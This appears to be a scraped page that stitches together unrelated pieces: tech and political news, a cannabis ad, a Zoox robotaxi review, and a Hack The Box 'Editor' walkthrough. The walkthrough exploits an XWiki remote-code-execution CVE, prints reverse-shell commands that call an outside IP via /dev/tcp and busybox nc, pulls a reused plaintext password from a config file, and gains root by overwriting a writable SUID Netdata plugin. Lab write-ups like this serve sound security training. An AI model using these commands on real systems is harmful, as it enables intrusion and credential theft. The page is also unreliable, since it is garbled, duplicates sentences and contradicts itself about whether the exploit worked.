[joppedc] wrote in to let us know that the Formula 1® season is coming to an end, and that the final race should be bangin’. To get ready, he built this ultra-sleek logo light box last week that does more than just sit there looking good, although it does that pretty well. This light box reacts to live race events, flashing yellow for safety cars, red for red flags, and green for, well, green flags.
The excellent light box itself was modeled in Fusion 360, and the files are available on MakerWorld. The design is split into four parts — the main body, a backplate to mount the LEDs, the translucent front plate, and an enclosure for an ESP32.
Doing it this way allowed [joppedc] to not only print in manageable pieces, it also allowed him to use different materials. Getting the front panel to diffuse light correctly took some experimenting to find the right thickness. Eventually, [joppedc] landed on 0.4 mm (two layers) of matte white PLA.
There isn’t much in the way of brains behind this beauty, just an ESP32, a strip of WS2812B addressable LEDs, and a USB-C port for power. But it’s the software stack that ties everything together. The ESP32 has WLED, Home Assistant runs the show, and of course, there is the F1 sensor integration to get live race data.
It’s only been a day since Netflix announced an $82.7 billion deal to acquire Warner Bros., and the acquisition has already been described as sending Hollywood into “full-blown panic mode,” “possibly a death blow to theatrical filmmaking,” and maybe even “the end of Hollywood” itself.
Amazon is experimenting again. This week on the GeekWire Podcast, we dig into our scoop on Amazon Now, the company’s new ultrafast delivery service. Plus, we recap the GeekWire team’s ride in a Zoox robotaxi on the Las Vegas Strip during Amazon Web Services re:Invent.
In our featured interview from the expo hall, AWS Senior Vice President Colleen Aubrey discusses Amazon’s push into applied AI, why the company sees AI agents as “teammates,” and how her team is rethinking product development in the age of agentic coding.
In this write-up, we will explore the “Editor” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Editor” machine from Hack The Box by achieving the following objectives:
User Flag:
Initial enumeration identifies an XWiki service on port 8080. The footer reveals the exact version, which is vulnerable to an unauthenticated Solr RCE (CVE-2025-24893). Running a public proof of concept provides a reverse shell as the xwiki service account. Exploring the installation directory reveals the hibernate.cfg.xml file, where plaintext database credentials are stored. These credentials are valid for the local user oliver as well. Using them for SSH access grants a stable shell as oliver, which makes it possible to read the user flag.
Root Flag:
Several plugin files are owned by root, set as SUID, and still group-writable. Since oliver belongs to the netdata group, these files can be modified directly. Additionally, this access allows a small SUID helper to be compiled and uploaded, which is then used to overwrite the ndsudo plugin. Afterwards, Netdata executes this plugin with root privileges during normal operation, and therefore, the replacement immediately forces the service to run the injected payload.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Port 22 (SSH): OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 – standard secure shell service for remote access.
Port 80 (HTTP): nginx 1.18.0 (Ubuntu) – web server acting as reverse proxy, redirects to http://editor.htb/.
Port 8080 (HTTP): Jetty 10.0.20 running XWiki – main application with WebDAV enabled, missing HttpOnly on JSESSIONID, and robots.txt exposing edit/save/delete paths.
What is XWiki?
XWiki is a free, open-source enterprise wiki platform written in Java. Think of it as a super-powered Wikipedia-style software that companies or teams install on their own servers to create internal knowledge bases, documentation sites, collaborative portals, etc.
Web Enumeration:
Web Application Exploration:
Perform web enumeration to discover potentially exploitable directories and files.
Landing on http://editor.htb, we’re greeted by the homepage of “SimplistCode Pro” – a sleek, modern web-based code editor that looks almost identical to VS Code, complete with Ace Editor, file tree, and integrated terminal.
Accessing http://10.10.11.180:8080/xwiki/bin/view/Main/ reveals the built-in XWiki documentation page for SimplistCode Pro – confirming the actual editor runs on an XWiki instance at port 8080.
After discovering that the web service on port 8080 is an XWiki instance and confirming the exact version 15.10.8 from the footer banner, we immediately searched for public exploits.
CVE-2025-24893: Unauthenticated Remote Code Execution in XWiki Platform
CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform, an open-source enterprise wiki software. It allows any guest user (no login required) to execute arbitrary Groovy code on the server by sending a specially crafted request to the SolrSearch macro. This flaw stems from improper sandboxing and sanitisation of Groovy expressions in asynchronous macro rendering, enabling attackers to inject and execute malicious code via search parameters
This version is vulnerable to CVE-2025-24893 – an unauthenticated Remote Code Execution in the Solr search component via malicious Groovy templates.
Testing the exploit syntax first – the script help shows mandatory flags -t (target URL) and -c (command).
Setting up our listener with nc -lvnp 9007 to catch the reverse shell.
We launch the final exploit python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c ‘bash -c “bash -i >/dev/tcp/10.10.14.189/9007 0>&1″‘ -e /bin/bash
Unfortunately, the CVE-2025-24893 exploit failed to pop a shell — no connection back to our listener—time to pivot and hunt for another path.
The exploit worked perfectly! Final command that popped the shell: python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c ‘busybox nc 10.10.14.189 9007 -e /bin/bash’ The script injected Groovy code via the vulnerable Solr search endpoint, executed busybox nc … -e /bin/bash, and gave us our reverse shell as the xwiki system user.
Achieving Initial Foothold as xwiki User on Editor machine via CVE-2025-24893
Back on our attacker box, we fire up nc -lvnp 9007. Moments later, the listener catches a connection from 10.10.11.80:59508. Running id confirms we successfully landed as xwiki (uid=997) – the exact user running the XWiki Jetty instance. Initial foothold achieved!
The shell is raw and non-interactive. We immediately stabilize it: which python3 → /usr/bin/python3 python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ Prompt changes to xwiki@editor:/usr/lib/xwiki-jetty$ – full TTY achieved, background color and everything.
Inside the limited shell as xwiki@editor, we see another user home directory called oliver. Attempting cd oliver instantly fails with Permission denied – no direct access yet, but we now know the real target user is oliver.
Quick enumeration with find / -name “xwiki” 2>/dev/null reveals all XWiki-related paths (config, data store, logs, webapps, etc.). Confirms we’re deep inside the actual XWiki installation running under Jetty.
ls in the same directory reveals the classic XWiki/Jetty config files, including the juicy hibernate.cfg.xml – this file almost always contains plaintext database credentials.
hibernate.cfg.xml credential reuse on editor machine
Full cat hibernate.cfg.xml confirms this is the real DB password used by the application. Classic misconfiguration: developers reuse the same password for the DB user and the system user oliver.
cat hibernate.cfg.xml | grep password instantly dumps multiple entries, and the first one is: theEd1t0rTeam99 Bingo – plaintext password for the XWiki database (and very often reused elsewhere).
While poking around /usr/lib/xwiki/WEB-INF/, we try su oliver and blindly guess the password theEd1t0rTeam99 (common pattern on HTB). It fails with an Authentication failure – wrong password, but we now know the exact target user is Oliver.
Attempting to SSH directly as xwiki@editor.htb results in “Permission denied, please try again.” (twice). Attackers cannot log in via password-based SSH because the xwiki system account lacks a valid password (a common setup for service accounts). We can only interact with the XWiki user via the reverse shell we already have from the CVE exploit. No direct SSH access here.
SSH as oliver
From our attacker box we can now SSH directly as oliver (optional, cleaner shell): ssh oliver@editor.htb → password theEd1t0rTeam99 → clean login
User flag successfully grabbed! We’re officially the oliver user and one step closer to root.
Escalate to Root Privileges Access on the Editor machine
Privilege Escalation:
Sorry, user oliver may not run sudo on editor. No passwordless sudo, no obvious entry in /etc/sudoers.
Only oliver’s normal processes visible: systemd user instance and our own bash/ps. No weird cronjobs, no suspicious parent processes. Confirms we need a deeper, non-obvious privesc vector.
After stabilising our shell as oliver, we immediately start hunting for privilege-escalation vectors. First, we run find / -perm 4000 2>/dev/null to enumerate SUID binaries – the output returns nothing interesting, instantly ruling out the classic GTFOBins path. To be thorough, we double-check find / -user root -perm 4000 2>/dev/null in case any root-owned SUIDs were missed, but the result is the same: no promising binaries. Straight-up SUID exploitation is off the table, so we pivot to deeper enumeration with LinPEAS and other techniques. Root will require a less obvious vector.
Linpeas Enumeration
Downloading LinPEAS into /dev/shm (tempfs, stays hidden and writable).
As oliver, we fire up LinPEAS in /dev/shm: ./linpeas.sh. The legendary green ASCII art confirms it’s running and scanning.
LinPEAS lights up the intended privesc path in bright red: a whole directory of Netdata plugins under /opt/netdata/usr/libexec/netdata/plugins.d/ are owned by root, belong to the netdata group, have the SUID bit set, and are writable by the group. Since groups oliver shows we’re in the netdata group, we can overwrite any of these binaries with our own malicious payload and instantly get a root shell the next time Netdata executes the plugin (which happens automatically every few seconds). Classic Netdata SUID misconfiguration, game over for root.
The key section “Files with Interesting Permissions” + “SUID – Check easy privesc” shows multiple Netdata plugins (like go.d.plugin, ndsudo, network-viewer.plugin, etc.) owned by root but executable/writable by the netdata group or others. Classic Netdata misconfiguration on HTB boxes.
Compiled locally with gcc dark.c -o nvme, this will be uploaded and used to overwrite one of the writable Netdata SUID plugins.
why Nvme?
We compile our SUID shell as nvme to specifically target the Netdata plugin ndsudo at /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo. This file is root-owned, SUID, belongs to the netdata group, and is group-writable. Since oliver is in the netdata group, we can overwrite it directly. Netdata periodically runs ndsudo as root, so replacing it with our payload triggers an instant root shell. The name nvme is short, harmless-looking, and doesn’t clash with real system binaries, making it the perfect stealthy replacement. Upload → overwrite ndsudo → wait a few seconds → root. Simple and deadly effective
curl our compiled nvme from the attacker machine → download complete
chmod +x nvme → make it executable. Temporarily prepend /dev/shm to PATH so we can test it locally
When testing our malicious nvme binary with the existing ndsudo plugin (/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list), it fails with “nvme : not available in PATH.” This is expected because we haven’t overwritten ndsudo yet—it’s still the original binary, and our nvme isn’t in the PATH for this test command. It’s a quick sanity check to confirm the setup before the real overwrite. Next, we’ll copy nvme directly over ndsudo to hijack it.
An ls in /dev/shm now shows nvme is missing — we already moved or deleted it during testing. No problem: we just re-download it with curl nvme, chmod +x nvme, and we’re back in business, ready for the final overwrite of ndsudo. Payload restored, stealth intact.
We re-download our malicious nvme, chmod +x it, prepend /dev/shm to PATH, and run the trigger command /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-listWe re-download our malicious nvme, chmod +x it, prepend /dev/shm to PATH, and run the trigger command /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
Root flag captured! With the Netdata plugin overwritten and triggered, we’ve spawned our SUID shell as root. Machine fully owned.
This was another busy week in the Linux ecosystem and wider FOSS community, with an update on the way for Linux Mint, growing Steam marketshare, and much more. Here are the biggest stories you might have missed.
A three-judge panel ruled Friday that President Donald Trump’s firings without cause of Cathy Harris and Gwynne Wilcox, Democratic members on the Merit Systems Protection Board and the National Labor Relations Board, were lawful.
The split 2-to-1 panel decision of the D.C. Circuit Court of Appeals has no immediate effect, since both Harris and Wilcox’s firings were finalized in May. But Friday’s ruling comes as the Supreme Court is expected to soon hear arguments on whether to overturn a 90-year-old ruling known as Humphrey’s Executor — a decision that could expand Trump’s power to shape independent agencies.
In the 1935 Supreme Court ruling on Humprey’s Executor, the justices unanimously found that commissioners can be removed only for misconduct or neglect of duty, effectively limiting when presidents can fire board members.
But when Judges Gregory Katsas and Justin Walker ruled Friday in favor of Trump’s firings of Harris and Wilcox, they argued that MSPB and NLRB fall outside the limitations stemming from Humphrey’s Executor, and that the president can still “remove principal officers who wield substantial executive power.”
“The NLRB and MSPB wield substantial powers that are both executive in nature and different from the powers that Humphrey’s Executor deemed to be merely quasi-legislative or quasi-judicial,” the judges wrote. “So, Congress cannot restrict the President’s ability to remove NLRB or MSPB members.”
Judge Florence Pan, the dissenting panel member and a Biden appointee, argued that the two agencies do fall under the scope of Humphrey’s Executor, and that maintaining the independence of MSPB and NLRB is critical. She wrote that the Trump administration’s “extreme view of executive power sharply departs from precedent.”
“We may soon be living in a world in which every hiring decision and action by any government agency will be influenced by politics, with little regard for subject-matter expertise, the public good, and merit-based decision-making,” she wrote.
The MSPB is an independent agency responsible for adjudicating appeals from federal employees who allege prohibited personnel practices by their agencies. The NLRB investigates unfair labor practices in the private sector and oversees union elections. Both boards are typically composed of members of both political parties.
Trump fired both Wilcox and Harris within his first few weeks in office, but did not point to a specific reason for the terminations. Wilcox and Harris, both of whom were Democratic board members, sued the president over their removals, arguing that they are protected by a federal law meant to ensure MSPB and NLRB’s independence from political considerations — and that the president can only remove them “for inefficiency, neglect of duty, or malfeasance in office.”
Though a federal judge initially ruled the two terminations were unlawful, the Supreme Court reversed that decision in May, effectively green-lighting the finalization of the board members’ firings earlier this year.
In its May decision, the Supreme Court indicated that it was likely “that both the NLRB and MSPB exercise considerable executive power,” which it said would make restrictions on the president’s ability to fire them unconstitutional. Friday’s panel ruling aligns with the Supreme Court’s initial arguments.
The Supreme Court is expected to hear arguments Monday on Trump’s firing of Rebecca Slaughter, a Democratic member of the Federal Trade Commission — a case that may further influence the outcome of both Harris and Wilcox’s terminations.
This holiday season will be a cold one, but AmeriCannaRx is helping you and yours stay warm with hot deals all December long. They are offering a gigantic 60% off discount on select products throughout the end of the year, so you’ll have more than enough to stuff your stocking. They’ll even price match any […]
Chinese-sponsored groups are using the popular Brickstorm backdoor to access and gain persistence in government and tech firm networks, part of the ongoing effort by the PRC to establish long-term footholds in agency and critical infrastructure IT environments, according to a report by U.S. and Canadian security offices.
The bidding war is over, and Netflix has been declared the winner.
After flirting with Paramount Skydance and Comcast, Warner Bros. Discovery (WBD) has decided to sell its streaming and movie studios business to Netflix. If approved, the deal is set to overturn the media landscape and create ripples that will affect Hollywood for years.
$72 billion acquisition
Netflix will pay an equity value of $72 billion, or an approximate total enterprise value of $82.7 billion, for Warner Bros. All of WBD has a $60 billion market value, NBC News notes.
Members of GeekWire’s team in Las Vegas posing for a selfie after taking Amazon’s Zoox robotaxis for a spin in Las Vegas, L-R: Brian Westbrook, Todd Bishop, Steph Stricklen, Holly Grambihler (front), and Jessica Reeves (right).
LAS VEGAS — Our toaster has arrived.
Amazon’s Zoox robotaxi service launched in Las Vegas this fall, and a few members of the hard-working GeekWire Studios crew joined me to try it out for a ride to dinner after a long day at AWS re:Invent. Zoox was nothing short of a hit with our group.
The consensus: it was a smooth, futuristic shuttle ride that felt safe amid the Las Vegas chaos, with per-seat climate control, and customizable music. (Somehow we landed on Cher, but in this vehicle, we felt no need to turn back time.) Most of all, the face-to-face seating made for a fun group experience, rather than a retrofitted car like Waymo.
Zoox, founded in 2014, was acquired by Amazon in 2020 for just over $1 billion, marking the tech giant’s move into autonomous vehicle technology and urban mobility. Zoox operates as an independent subsidiary, based in Foster City, Calif.
Unlike competitors that retrofit vehicles, Zoox designed its robotaxi from scratch. It’s a compact, 12-foot-long electric pod, bidirectional, without steering wheel or pedals.
The experience of calling the Zoox vehicle on the app was seamless and quick. The doors opened via a button in the app after the carriage arrived to pick us up at a designated station between Fashion Show Mall and Trump International Hotel.
Inside, our nighttime ride featured a starfield display on the interior ceiling of the cab, adding to the magical feel, with functional seats comfortable enough for a drive across the city.
Jessica Reeves, left, and Steph Stricklen check out the interior of the Zoox carriage. (GeekWire Photo / Brian Westbrook)
A few of us had experienced Waymo in California, so it was natural to make the comparison. One thing I missed was the live virtual road view that Waymo provides, representing surrounding vehicles and roadways, which provides some reassurance.
Emergency human assistance also seemed more accessible in the Waymo vehicles than in the Zoox carriage. And unlike the Waymo Jaguar cars that I’ve taken in San Francisco, the build quality of the Zoox vehicle felt more utilitarian than luxury.
For this current phase of the Vegas rollout, one major downside is the limited service area — just seven fixed spots along the Las Vegas strip, like Resorts World, Luxor, and AREA15, requiring walks between hubs rather than seamless point-to-point hails. It’s more of a novelty for that reason, rather than a reliable form of transportation.
But hey, the rides are free for now, so it’s hard to complain.
And the ability to sit across from each other more than made up for any minor quibbles. (Our group of five split up and took two four-person carriages from Fashion Show Mall to Resorts World.) Compared to the Waymo experience, the Zoox vehicle feels less like sitting in a car and more like sharing a moving living room.
GeekWire Studios host Steph Stricklen was initially skeptical — wondering if Vegas would be the right place for an autonomous vehicle, given the chaotic backdrop and unpredictable traffic patterns on the Strip. But she walked away a believer, giving the ride a “10 out of 10” and saying she never felt unsafe as a passenger.
“It felt very Disneyland,” said GeekWire Studios host Brian Westbrook, citing the creature comforts such as climate control that seemed to be isolated to each seat. Along with music and other controls, that’s one of the features that can be accessed via small touch-screen displays for each passenger on the interior panel of the vehicle.
GeekWire project manager Jessica Reeves said she almost forgot that there wasn’t a human driving. Despite rapid acceleration at times, the ride was smooth.
“It didn’t feel like I was riding in an autonomous vehicle, maybe it was just the buzz of experiencing this new way of transportation,” Jessica messaged me afterward, reflecting on the experience. “The spaciousness, facing my friends, exploring the different features, it all happened so fast that before I knew it, we were there!”
Holly Grambihler, GeekWire’s chief sales and marketing officer, was impressed with the clean interior and comfortable seats.
“It felt less like a vehicle and more like a mobile karaoke studio with the customized climate control and ability to choose your music — Cher in Vegas, perfect!” Holly said. “It felt safe with our short ride. I don’t think I’d take a Zoox on a freeway yet.”
On that point: Zoox’s purpose-built pod is engineered to reach highway speeds of up to about 75 mph, and the company has tested it at those velocities on closed tracks. In Las Vegas, though, the robotaxis currently stick to surface streets at lower speeds, and Zoox hasn’t yet started mixing into freeway traffic.
The Zoox station outside Resorts World Las Vegas. (GeekWire Photo / Brian Westbrook)
The Vegas service launch marked Zoox’s first public robotaxi deployment, offering free rides along a fixed loop on and around the Strip while gathering data for paid trips. Zoox followed with a limited public launch in San Francisco in November.
For Amazon, the technology represents a long-term bet, with the potential to contribute to its logistics operations. It’s not hard to imagine similar vehicles shuttling packages in the future. But for now the focus is on public ridership.
The company has flagged Austin, Miami, Los Angeles, Atlanta, Washington, D.C., and Seattle as longer-term potential markets for the robotaxi service as regulations and technology mature. We’ve contacted Zoox for the latest update on its plans.
If our own ride this week was any indication, the company’s biggest challenge may simply be expanding the robotaxi service fast enough for more people to try it.
Editor’s note: GeekWire Studios is the content production arm of GeekWire, creating sponsored videos, podcasts, and other paid projects for a variety of companies and organizations, separate from GeekWire’s independent news coverage. GeekWire Studios had a booth at re:Invent, recording segments with Amazon partners in partnership with AWS. Learn more about GeekWire Studios.
Scrolling through Netflix's vast anime titles can feel like a daunting task, especially if you're like me and not knee-deep in the genre. The streaming service makes it easy to delve into classic and newer episodic series and movies, and you're sure to find something you like.
A newly proposed payroll tax would add new costs for large businesses in Washington state. But Rep. Shaun Scott, a Seattle Democrat sponsoring the bill, argues it would protect the basic services that help companies recruit and retain talent.
“People are looking to the state legislature for leadership on protecting the programs that make our state actually a healthy climate to do business in,” Scott told GeekWire this week.
House Bill 2100, pre-filed this week in Olympia, would create the “Well Washington Fund” and levy a 5% payroll expense tax on “large operating companies” for employee wages above a $125,000 threshold. The bill defines a “large operating company” as one with more than 20 employees and more than $5 million in gross receipts or sales, among other criteria. Employers with total employee wages under $7 million in the prior year would be exempt.
Scott is pitching the bill as a state backstop against federal cuts hitting Medicaid, higher education, housing and other programs. He said it would generate more than $2 billion annually and impact the about 4,300 businesses — including Redmond, Wash.-based tech giant Microsoft and telecom behemoth T-Mobile, headquartered in Bellevue.
Seattle-based companies such as Amazon that already pay the city’s JumpStart payroll tax would be exempt.
Scott said there is a “corollary effect” on corporations from policies that benefit “everyday people.”
“My sense of it is that the public is on our side on this issue,” he said. “They understand that when you have very well-funded higher education, what that means is a well-trained workforce that could seek employment at a place like Microsoft or Amazon — and the company would benefit as a result.”
“When you have people who have very good housing options, that makes Washington that much more of a competitive place to come and do business,” he added.
Business groups are wary of the proposal. Rachel Smith, the new CEO of Washington Roundtable, called it a “tax-first, plan later” idea. She also cited the state’s recent tax increases impacting businesses — passed in part to help address a $16 billion budget shortfall — and broader economic uncertainty.
Washington Roundtable CEO Rachel Smith. (Washington Roundtable Photo)
“If a job is cheaper somewhere else, and a company has an operational environment that allows them to deploy that job somewhere else, of course that’s going to be something they consider,” Smith said in an interview with GeekWire.
Lawmakers tried to pass a similar statewide payroll tax this year, but the bill did not advance. In March, Microsoft President Brad Smith criticized that tax proposal and said it would increase prices for consumers, reduce jobs, and hurt the tech industry.
Microsoft declined to comment on Rep. Scott’s proposal when contacted by GeekWire this week.
Rep. Scott said it’s “disingenuous” that critics raise alarms about companies leaving when the state talks about funding the safety net, but don’t ask similar questions when companies cut jobs on their own. He said the relocation question “does not come up when we see large tech firms investing in artificial intelligence, which is designed to divest from human labor.”
Washington is one of a few states without a personal or corporate income tax. Most state revenue comes from sales, property, and B&O taxes — a system critics say disproportionately burdens lower-income residents.
Gabriella Buono, interim president and CEO at the Seattle Metro Chamber, said that “raising taxes in an affordability crisis will mean higher prices on everyday essentials, fewer job opportunities, and more closures in sectors that are already on the edge.”
“Voters across the political spectrum are clear: they want smart spending, transparency, and results, not new taxes that make it harder to live and work in this state,” Buono said in a statement.
Revenue from the proposed bill would initially go to the state general fund in 2026, then split beginning in 2027, with 51% directed to a dedicated Well Washington fund account and 49% to the general fund. A new oversight and accountability board would guide priorities and report annually. Spending from the account would be limited to higher education, health care — especially Medicaid — cash assistance, and energy and housing programs.
Demogorgons are cool and all, but sometimes the best stories on Netflix aren't the scripted ones. I love delving into a good documentary because they offer glimpses down the rabbit hole of odd and fascinating topic you never knew existed, as well as unprecedented access behind the scenes of some of the world's highest profile people and their lives.
For too long, security has been cast as a bottleneck – swooping in after developers build and engineers test to slow things down. The reality is blunt; if it’s bolted on, you’ve already lost. The ones that win make security part of every decision, from the first line of code to the last boardroom conversation...
Login
The excellent light box itself was modeled in Fusion 360, and the files are available on MakerWorld. The design is split into four parts — the main body, a backplate to mount the LEDs, the translucent front plate, and an enclosure for an ESP32.